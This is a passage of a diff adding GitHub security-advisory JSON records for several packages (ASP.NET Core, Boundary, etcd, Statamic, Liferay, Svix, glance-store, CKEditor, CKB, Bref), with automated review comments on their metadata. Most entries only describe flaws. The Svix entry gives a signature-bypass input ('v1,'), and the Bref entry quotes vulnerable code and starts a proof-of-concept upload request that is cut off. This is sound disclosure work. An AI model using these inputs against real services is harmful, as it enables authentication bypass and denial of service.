"ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.osx-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.osx-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-arm" + }, + "ranges": 
[ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-arm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-arm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-arm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.osx-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] 
+ } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-arm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-arm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/dotnet/aspnetcore/security/advisories/GHSA-vh55-786g-wjwj" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:47:54Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-vh73-q3rw-qx7w/GHSA-vh73-q3rw-qx7w.json b/advisories/github-reviewed/2024/02/GHSA-vh73-q3rw-qx7w/GHSA-vh73-q3rw-qx7w.json new file mode 100644 index 0000000000000..dbbc49601b259 --- /dev/null 
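Review bot: `aliases` is left empty even though the last line of the details points at MSRC for CVE-2022-34716, so the alias list should carry `"CVE-2022-34716"` so scanners can correlate this GHSA with the CVE. The same hunk leaves `severity` empty while `database_specific.severity` is `CRITICAL`; a label with no vector behind it cannot be reconciled with the MSRC rating, so either add the CVSS vector from the MSRC entry or reduce the label to what can be sourced. In the .NET Core 3.1 table the first `System.Security.Cryptography.Xml` row links to `http://system.security` instead of the NuGet page the 6.0 row uses, and "applicaiton" in the affected-software list is a typo. `cwe_ids` is also empty for what the text describes as an information disclosure.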
+++ b/advisories/github-reviewed/2024/02/GHSA-vh73-q3rw-qx7w/GHSA-vh73-q3rw-qx7w.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh73-q3rw-qx7w", + "modified": "2024-02-05T23:06:56Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2024-1052" + ], + "summary": "Boundary vulnerable to session hijacking through TLS certificate tampering", + "details": "Boundary and Boundary Enterprise (“Boundary”) is vulnerable to session hijacking through TLS certificate tampering. An attacker with privileges to enumerate active or pending sessions, obtain a private key pertaining to a session, and obtain a valid trust on first use (TOFU) token may craft a TLS certificate to hijack an active session and gain access to the underlying service or application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/boundary" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.8.0" + }, + { + "fixed": "0.15.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1052" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2024-02-boundary-vulnerable-to-session-hijacking-through-tls-certificate-tampering/62458" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hashicorp/boundary" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T23:06:56Z", + "nvd_published_at": "2024-02-05T21:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-vjg6-93fv-qv64/GHSA-vjg6-93fv-qv64.json b/advisories/github-reviewed/2024/02/GHSA-vjg6-93fv-qv64/GHSA-vjg6-93fv-qv64.json new file mode 100644 index 0000000000000..67c2c045911c8 --- /dev/null 
+++ b/advisories/github-reviewed/2024/02/GHSA-vjg6-93fv-qv64/GHSA-vjg6-93fv-qv64.json 
@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjg6-93fv-qv64", + "modified": "2024-02-03T00:03:09Z", + "published": "2024-02-03T00:03:09Z", + "aliases": [ + + ], + "summary": "Etcd auth Inaccurate logging of authentication attempts for users with CN-based auth only", + "details": "### Vulnerability type\nLogging\n\n### Detail\netcd users who have no password can authenticate only through a client certificate. When such users try to authenticate into etcd using the Authenticate endpoint, errors are logged with insufficient information regarding why the authentication failed, and may be misleading when auditing etcd logs.\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.4.9" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-vjg6-93fv-qv64" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:03:09Z", + "nvd_published_at": null + } +} \ No newline at end of file 
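Review bot: `cwe_ids` is empty although the details describe authentication-failure errors being logged with insufficient information, which is a logging weakness (presumably CWE-778 or CWE-223 — confirm against the audit finding). `severity` is likewise empty while `database_specific.severity` says `LOW`, so the label has no vector backing it. Both reference links in the details point at the `master` branch of the etcd repository; pinning them to a tag or commit would keep the audit-report and security-process citations from drifting as the branch moves.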
diff --git a/advisories/github-reviewed/2024/02/GHSA-vqxq-hvxw-9mv9/GHSA-vqxq-hvxw-9mv9.json b/advisories/github-reviewed/2024/02/GHSA-vqxq-hvxw-9mv9/GHSA-vqxq-hvxw-9mv9.json new file mode 100644 index 0000000000000..537fc912c91c2 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-vqxq-hvxw-9mv9/GHSA-vqxq-hvxw-9mv9.json 
@@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vqxq-hvxw-9mv9", + "modified": "2024-02-01T20:51:46Z", + "published": "2024-02-01T20:51:46Z", + "aliases": [ + "CVE-2024-24570" + ], + "summary": "Statmic CMS vulnerable to account takeover via XSS and password reset link", + "details": "### Impact\n\nHTML files crafted to look like jpg files are able to be uploaded, allowing for XSS.\n\nThis affects:\n\n- front-end forms with asset fields without any mime type validation\n- asset fields in the control panel\n- asset browser in the control panel\n\nAdditionally, if the XSS is crafted in a specific way, the \"copy password reset link\" feature may be exploited to gain access to a user's password reset token and gain access to their account. The authorized user is required to execute the XSS in order for the vulnerability to occur.\n\n### Patches\n\nIn versions 4.46.0 and 3.4.17, the XSS vulnerability has been patched, and the copy password reset link functionality has been disabled. 
(Users may still trigger password reset emails.)\n\n### Credits\n\nStatamic thanks Niklas Schilling (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab (https://www.sec-consult.com/) for responsibly reporting the identified issues and working with us as we addressed them.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "statamic/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.00" + }, + { + "fixed": "4.46.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "statamic/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.4.17" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/statamic/cms/security/advisories/GHSA-vqxq-hvxw-9mv9" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24570" + }, + { + "type": "PACKAGE", + "url": "https://github.com/statamic/cms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79", + "CWE-80" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:51:46Z", + "nvd_published_at": "2024-02-01T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-w275-m8cr-hf2v/GHSA-w275-m8cr-hf2v.json b/advisories/github-reviewed/2024/02/GHSA-w275-m8cr-hf2v/GHSA-w275-m8cr-hf2v.json new file mode 100644 index 0000000000000..c5cde7747820f --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-w275-m8cr-hf2v/GHSA-w275-m8cr-hf2v.json 
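Review bot: The first `statamic/cms` range uses `"introduced": "4.00"`, which is not a normalized version; every other event in this hunk and in the sibling advisories uses three-component versions, so it should read `"introduced": "4.0.0"` to compare reliably in Packagist-aware tooling. The `summary` also misspells the product as `Statmic`; `"Statamic CMS vulnerable to account takeover via XSS and password reset link"` matches the details. Since the details name front-end asset fields "without any mime type validation" as an affected surface, a one-line mitigation — enable server-side MIME/content validation on those fields — would help users who cannot upgrade immediately.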
@@ -0,0 +1,118 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w275-m8cr-hf2v", + "modified": "2024-02-08T18:26:21Z", + "published": "2024-02-08T06:30:23Z", + "aliases": [ + "CVE-2024-25144" + ], + "summary": " Liferay Portal denial-of-service vulnerability", + "details": "The IFrame widget in Liferay Portal 7.2.0 through 7.4.3.26, and older unsupported versions, and Liferay DXP 7.4 before update 27, 7.3 before update 6, 7.2 before fix pack 19, and older unsupported versions does not check the URL of the IFrame, which allows remote authenticated users to cause a denial-of-service (DoS) via a self referencing IFrame.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.4.3.27" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.2.10.fp19" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.3.0" + }, + { + "fixed": "7.3.10.u6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.4.0" + }, + { + "fixed": "7.4.13.u27" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25144" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + "type": "WEB", + "url": 
"https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25144" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-834" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:26:20Z", + "nvd_published_at": "2024-02-08T04:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-w277-wpqf-rcfv/GHSA-w277-wpqf-rcfv.json b/advisories/github-reviewed/2024/02/GHSA-w277-wpqf-rcfv/GHSA-w277-wpqf-rcfv.json new file mode 100644 index 0000000000000..a863191b7e3c3 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-w277-wpqf-rcfv/GHSA-w277-wpqf-rcfv.json 
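Review bot: `summary` begins with a leading space (`" Liferay Portal denial-of-service vulnerability"`), which shows up verbatim in rendered titles and breaks exact-match searches; trim it to `"Liferay Portal denial-of-service vulnerability"`. The Portal range ending at `7.4.3.27` agrees with the details' "7.2.0 through 7.4.3.26", but the details also list "older unsupported versions" as affected while `introduced` is `7.2.0`; if releases before 7.2.0 are affected, `introduced` should be `"0"` so the range does not silently clear them.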
@@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w277-wpqf-rcfv", + "modified": "2024-02-06T20:30:14Z", + "published": "2024-02-06T20:30:14Z", + "aliases": [ + + ], + "summary": "Svix vulnerable to improper comparison of different-length signatures", + "details": "The `Webhook::verify` function incorrectly compared signatures of different lengths - the two signatures would only be compared up to the length of the shorter signature. This allowed an attacker to pass in `v1,` as the signature, which would always pass verification.\n", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "svix" + }, + "ecosystem_specific": { + "affected_functions": [ + "svix::webhooks::Webhook::verify" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.17.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/svix/svix-webhooks/pull/1190" + }, + { + "type": "WEB", + "url": "https://github.com/svix/svix-webhooks/commit/958821bd3b956d1436af65f70a0964d4ffb7daf6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/svix/svix-webhooks" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2024-0010.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T20:30:14Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-wgpq-p2hm-56v9/GHSA-wgpq-p2hm-56v9.json b/advisories/github-reviewed/2024/02/GHSA-wgpq-p2hm-56v9/GHSA-wgpq-p2hm-56v9.json new file mode 100644 index 0000000000000..485ff86916d34 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-wgpq-p2hm-56v9/GHSA-wgpq-p2hm-56v9.json 
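Review bot: `cwe_ids` is empty even though the details describe a signature check that passes for `v1,` regardless of the real signature, which is a verification bypass (CWE-347, improper verification of cryptographic signature, with CWE-697 incorrect comparison as the root cause — confirm against the linked PR). `severity` carries no vector while `database_specific.severity` says `MODERATE`; for a check the text says "would always pass verification", a sourced vector should back the label rather than leaving it unsupported. A sentence in the details telling integrators that a correct check compares lengths before a constant-time byte comparison would make the fix reusable for readers who hand-roll verification against the same scheme.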
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wgpq-p2hm-56v9", + "modified": "2024-02-05T22:32:25Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2024-1141" + ], + "summary": "glance-store logs s3 access keys", + "details": "A vulnerability was found in python-glance-store. The issue occurs when the package logs the access_key for the glance-store when the DEBUG log level is enabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "glance-store" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.6.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1141" + }, + { + "type": "WEB", + "url": "https://github.com/openstack/glance_store/commit/d6e531af4821c8466b1e9404f12f89f6216417f2" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-1141" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258836" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openstack/glance_store" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T22:32:25Z", + "nvd_published_at": "2024-02-01T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-wh5w-82f3-wrxh/GHSA-wh5w-82f3-wrxh.json b/advisories/github-reviewed/2024/02/GHSA-wh5w-82f3-wrxh/GHSA-wh5w-82f3-wrxh.json new file mode 100644 index 0000000000000..e2600e158621e --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-wh5w-82f3-wrxh/GHSA-wh5w-82f3-wrxh.json 
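Review bot: The range ends with `"last_affected": "4.6.1"` rather than a `fixed` event even though the references cite fix commit `d6e531af…`; if that commit shipped in a release, the event should become `"fixed": "<that version>"` so scanners stop flagging later releases, and if it has not, the details should say the fix is unreleased. The details would also benefit from the practitioner caveat that logs already produced at DEBUG level contain the S3 `access_key` and need to be scrubbed and the key rotated — upgrading alone does not retract what was logged.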
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh5w-82f3-wrxh", + "modified": "2024-02-07T18:21:05Z", + "published": "2024-02-07T17:34:11Z", + "aliases": [ + "CVE-2023-4771" + ], + "summary": "CKEditor cross-site scripting vulnerability in AJAX sample", + "details": "### Affected packages\nThe vulnerability has been discovered in the AJAX sample available at the `samples/old/ajax.html` file location. All integrators that use that sample in the production code can be affected.\n\n### Impact\n\nA potential vulnerability has been discovered in one of CKEditor's 4 samples that are shipped with production code. The vulnerability allowed to execute JavaScript code by abusing the AJAX sample. It affects all users using the CKEditor 4 at version < 4.24.0-lts where `samples/old/ajax.html` is used in a production environment.\n\n### Patches\nThe problem has been recognized and patched. The fix will be available in version 4.24.0-lts.\n\n### For more information\nEmail us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.\n\n### Acknowledgements\nThe CKEditor 4 team would like to thank Rafael Pedrero and INCIBE ([original report](https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cksource-ckeditor)) for recognizing and reporting this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ckeditor4" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.24.0-lts" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-wh5w-82f3-wrxh" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4771" + }, + { + "type": "WEB", + "url": 
"https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ckeditor/ckeditor4" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cksource-ckeditor" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T17:34:11Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-wjxc-pjx9-4wvm/GHSA-wjxc-pjx9-4wvm.json b/advisories/github-reviewed/2024/02/GHSA-wjxc-pjx9-4wvm/GHSA-wjxc-pjx9-4wvm.json new file mode 100644 index 0000000000000..f733eb1374776 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-wjxc-pjx9-4wvm/GHSA-wjxc-pjx9-4wvm.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjxc-pjx9-4wvm", + "modified": "2024-02-03T00:18:06Z", + "published": "2024-02-03T00:18:06Z", + "aliases": [ + + ], + "summary": "Nervos CKB Panic on malformed input", + "details": "### Impact\nCKB process will panic when received malformed p2p message because of snappy, which is used to compress network messages\n\n### References\nhttps://github.com/BurntSushi/rust-snappy/issues/29", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.34.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.34.1" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-wjxc-pjx9-4wvm" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:18:06Z", + "nvd_published_at": null + } +} \ No newline at end of file 
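Review bot: The `ckeditor4` range flags every version below `4.24.0-lts`, but the details say the issue lives only in `samples/old/ajax.html` and affects integrators who ship that sample to production; the details should state the mitigation that follows — remove the `samples/` directory from production deployments — so users pinned to an older version know they are not exposed once the sample is gone. The "Patches" paragraph still reads in the future tense ("The fix will be available in version 4.24.0-lts") while the range records it as fixed; "The fix is available in version 4.24.0-lts" matches the range.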
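Review bot: `cwe_ids` is empty and `severity` has no vector while `database_specific.severity` is `HIGH`; the details describe a process panic on a malformed p2p message, so a CWE for unhandled input (presumably CWE-20 or CWE-248 — confirm) and a sourced vector would back the label. The root cause is attributed to the snappy dependency (the only reference is the rust-snappy issue), but the advisory does not say whether 0.34.2 upgrades the crate or guards decompression inside CKB; one sentence on that would tell operators whether other users of the same crate version are also exposed.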
diff --git a/advisories/github-reviewed/2024/02/GHSA-x4hh-frx8-98r5/GHSA-x4hh-frx8-98r5.json b/advisories/github-reviewed/2024/02/GHSA-x4hh-frx8-98r5/GHSA-x4hh-frx8-98r5.json new file mode 100644 index 0000000000000..1abffc11a616a --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-x4hh-frx8-98r5/GHSA-x4hh-frx8-98r5.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x4hh-frx8-98r5", + "modified": "2024-02-01T20:53:03Z", + "published": "2024-02-01T20:53:03Z", + "aliases": [ + "CVE-2024-24752" + ], + "summary": "Bref's Uploaded Files Not Deleted in Event-Driven Functions", + "details": "## Impacted Resources\n\nbref/src/Event/Http/Psr7Bridge.php:94-125\n\n## Description\n\nWhen Bref is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object.\nDuring the conversion process, if the request is a MultiPart, each part is parsed and for each which contains a file, it is extracted and saved in `/tmp` with a random filename starting with `bref_upload_`.\n\nThe function implementing the logic follows:\n\n```php\nprivate static function parseBodyAndUploadedFiles(HttpRequestEvent $event): array\n{\n $bodyString = $event->getBody();\n $files = [];\n $parsedBody = null;\n $contentType = $event->getContentType();\n if ($contentType !== null && $event->getMethod() === 'POST') {\n if (str_starts_with($contentType, 'application/x-www-form-urlencoded')) {\n parse_str($bodyString, $parsedBody);\n } else {\n $document = new Part(\"Content-type: $contentType\\r\\n\\r\\n\" . 
$bodyString);\n if ($document->isMultiPart()) {\n $parsedBody = [];\n foreach ($document->getParts() as $part) {\n if ($part->isFile()) {\n $tmpPath = tempnam(sys_get_temp_dir(), 'bref_upload_');\n if ($tmpPath === false) {\n throw new RuntimeException('Unable to create a temporary directory');\n }\n file_put_contents($tmpPath, $part->getBody());\n $file = new UploadedFile($tmpPath, filesize($tmpPath), UPLOAD_ERR_OK, $part->getFileName(), $part->getMimeType());\n\n self::parseKeyAndInsertValueInArray($files, $part->getName(), $file);\n } else {\n self::parseKeyAndInsertValueInArray($parsedBody, $part->getName(), $part->getBody());\n }\n }\n }\n }\n }\n return [$files, $parsedBody];\n}\n```\n\nThe flow mimics what plain PHP does but it does not delete the temporary files when the request has been processed.\n\n## Impact\n\nAn attacker could fill the Lambda instance disk by performing multiple MultiPart requests containing files.\nThe attack has the following requirements and limitations:\n- The Lambda should use the Event-Driven Function runtime.\n- The Lambda should use the `RequestHandlerInterface` handler.\n- The Lambda should implement at least an endpoint accepting POST requests.\n- The attacker can send requests up to 6MB long, so multiple requests are required to fill the disk (the default Lambda disk size is 512MB, therefore with less than 100 requests the disk could be filled).\n\n## PoC\n\n1. Create a new Bref project.\n2. Create an `index.php` file with the following content:\n```php\n` placeholder with the deployed Lambda domain:\n```\nPOST /upload HTTP/2\nHost: \nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Length: 180\n\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Disposition: form-data; name=\"a\"; 